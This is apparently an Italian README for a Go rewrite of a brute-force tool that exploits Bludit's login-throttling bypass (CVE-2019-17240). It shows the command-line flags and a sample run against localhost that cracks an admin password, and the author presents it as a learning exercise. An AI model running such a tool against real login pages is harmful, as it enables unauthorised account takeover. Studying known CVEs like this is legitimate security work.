
Strumento di brute-force basato su Go che sfrutta il bypass della mitigazione del brute-force di Bludit (CVE-2019-17240) per il cracking automatico delle password contro le pagine di login admin.
Questo è un piccolo progetto in cui ho riscritto questo script Python in Golang. Lo scopo di questo progetto era imparare Golang e capire come funziona questo exploit.
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
Tranne il flag threads, tutti gli altri flag sono obbligatori.
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password